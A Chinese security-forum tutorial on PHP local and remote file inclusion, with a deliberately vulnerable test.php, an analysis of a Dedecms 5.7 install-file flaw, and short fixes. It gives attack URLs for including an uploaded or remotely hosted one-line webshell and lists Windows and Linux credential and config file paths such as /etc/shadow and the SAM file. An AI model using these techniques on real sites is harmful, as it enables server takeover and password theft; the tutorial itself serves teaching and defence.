Web安全之走进文件包含的世界
来源:http://bbs.ichunqiu.com/thread-9817-1-1.html?from=ch
社区:i春秋
时间:2016年8月9日22:42:00
作者:LoneliNess
前言
俗话说:“知己知彼,方能百战不殆”,今天,小编就带着你们走进文件包含的世界,去进一步的了解它,深入它……………….如有错误,请你雅正!!
目录
第一节初识文件包含漏洞
· 1.1、 什么是包含
· 1.2、 文件包含漏洞是怎样产生的
· 1.3、 文件包含漏洞的分类
第二节 详解PHP文件包含漏洞
· 1.4、解析PHP文件包含
· 1.5、文件包含实例及漏洞分析
· 1.6、常见的几种攻击手法
· 1.7、修复方案
第三节 严正声明
正文
第一节初识文件包含漏洞
1.1、 什么是包含
程序猿常常把可以重复利用的函数写到单文件中,在使用一些函数时,直接调用,无须再次编写,这种过程呢,就称为包含
1.2、 文件包含漏洞是怎样产生的
程序猿为了让代码更灵活,会设置一些变量,用来动态调用,由于这种灵活,使客户端阔以调用一个恶意的文件,从而造成文件包含漏洞
1.3、 文件包含漏洞的分类
文件包含漏分为本地文件包含(Local File Inclusion)程文件包含(Remote FileInclusion)
第二节 文件包含漏洞实例及常见的几种攻击手法
1.4、 解析文件包含
PHP文件包含漏洞涉及到的危险函数:
include(),require()和include_once(),require_once()
以上这些函数都阔以进行文件包含,但作用不同,区别如下:
Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。
Require:找不到包含文件产生致命错误,并停止脚本
Include_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。
Require_once:这个函数跟require的区别 跟上面我所讲的include和include_once是一样的。所以我就不重复了。
1.5、 文件包含实例及漏洞分析
1)文件包含实例
本次测试,服务器环境为:
PHP 5.3.29
Mysql 5.0.8
Apache 2.4.18
1 本地文件包含(LFI)
小编写了一个test.php文件
[AppleScript]纯文本查看复制代码
1
2
3
4
5
if(isset($_GET['file'])){
$file=$_GET['file'];
include $file;}
?>
然后在写包含了一个phpinfo.txt进入文件内容是符合PHP语法的代码
[AppleScript]纯文本查看复制代码
1
2
3
phpinfo();
?>
之后的效果如图所示
2 远程文件包含(RFI)
小编在这里须强调的是远程文件包含,必须要确定PHP开启了远程包含功能选项,开启此功能须在PHP.ini配置文件中修改,成功后重启服务器生效
即allow_url_include=on
实例如下:
www.xxxcom目录下存在1.txt,代码如下(PS:没有丝毫骂蛋总的意思):
[AppleScript]纯文本查看复制代码
1
2
3
echo"yyyxy is a bad man"
?>
在test.php中代码如下:
[AppleScript]纯文本查看复制代码
1
2
3
4
5
if(isset($_GET['file'])){
$file=$_GET['file'];
include $file;}
?>
访问url:http://www.xxxcom/test.php?file=http://localhost/1.txt
2)漏洞实例分析
就拿Dedecms5.7 来讲解吧(PS:想听更好的讲解可以去i春秋官网学习)
i春秋文件包含课程讲解地址:http://www.ichunqiu.com/course/51575
广告打得有点生硬,第一次,不好意思……..
这个漏洞主要由两个原因引起的,其中最重要的一个原因,便是开发者没有认识到Apache服务器解析文件的流程,从而导致安
装文件在安装后居然可以被继 续访问。这里接单解释下Apache解析文件的流程:
当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那 么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。
那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apache解析漏洞。
问题出在这里install/index.php.bak
[AppleScript]纯文本查看复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16[php]
else if($step==11)
{
require_once(‘../data/admin/config_update.php’);
$rmurl=$updateHost.”dedecms/demodata.{$s_lang}.txt”;
echo $rmurl;
$sql_content=file_get_contents($rmurl);
$fp=fopen($install_demo_name,’w’);
if(fwrite($fp,$sql_content))
echo ‘ [√] 存在(您可以选择安装进行体验)’;
else
echo ‘ [×] 远程获取失败’;
unset($sql_content);
fclose($fp);
exit();
[/php]
了解Dedecms参数机制的同学都知道,代码中的一些变量我们是可以通过GET参数的方式进行操控的。那么上面代码很明显,可以向指定的文件内写入任意内容,从而导致获取webshell
如果想听更详细的讲解请到http://www.ichunqiu.com/course/51575
1.6、 常见的几种攻击手法
1) 本地包含配合上传拿shell
大多数网站都会有上传功能,上传个图片,假设已上传图片一句话木马,路径为xxx/1.jpg,访问http://www.xxx.com/index.php?file=./xxx/1.jpg
2) 远程包含拿shell
这种应该非常少见了吧,目标主机必须保证allow_url_include=on情况,在http://***.com/根目录下有一个一句话木马的txt,访问http://www.xxx.com/index.php?file=http://***.com/muma.txt
3)读取敏感信息
访问url:http://www.xxx.com/index.php?file=/etc/my.conf
如果存在本文件,他会读出文件的内容……..反之
常见的敏感信息路径
Windows系统
c:\boot.ini // 查看系统版本
c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件
c:\windows\repair\sam // 存储Windows系统初次安装的密码
c:\ProgramFiles\mysql\my,ini // MySQL配置
c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root
c:\windows\php.ini // php 配置信息
c:\windows\my.ini // MySQL 配置文件
......
Linux/Unix系统
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置
/usr/local/app/php5/lib/php.ini // PHP相关配置
/etc/httpd/conf/httpd.conf // Apache配置文件
/etc/my.conf // mysql 配置文件
1.7、 修复方案
限制路径,禁止跳转字符,如:../
把需要包含的页面固定写好,如:include(“test.php”)
第三节 严正声明
本文讨论的技术仅用于研究学习技术交流,严禁用于非法行为和破坏行为,否则造成的一切法律责任与作者以及本网站无关。
本文原创作者:LoneliNess,转载须注明来自i春秋社区(BBS.ichunqiu.com)
结束语:
I春秋,你值得拥有!!不忘初心,方得始终!!!